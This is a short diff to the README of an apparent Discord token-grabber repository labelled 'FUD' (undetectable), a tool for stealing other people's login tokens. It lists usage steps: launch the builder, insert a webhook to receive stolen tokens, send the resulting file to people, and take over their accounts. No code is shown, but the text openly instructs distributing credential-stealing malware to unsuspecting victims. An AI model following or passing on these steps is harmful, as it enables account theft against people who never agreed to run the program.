uman147/FUD_Discord_TokenGrabber/README.md

 1. Launch the builder
 2. put in ur webhook
-3. send it to people ig
+3. send it to people
 4. ezzzzz accounts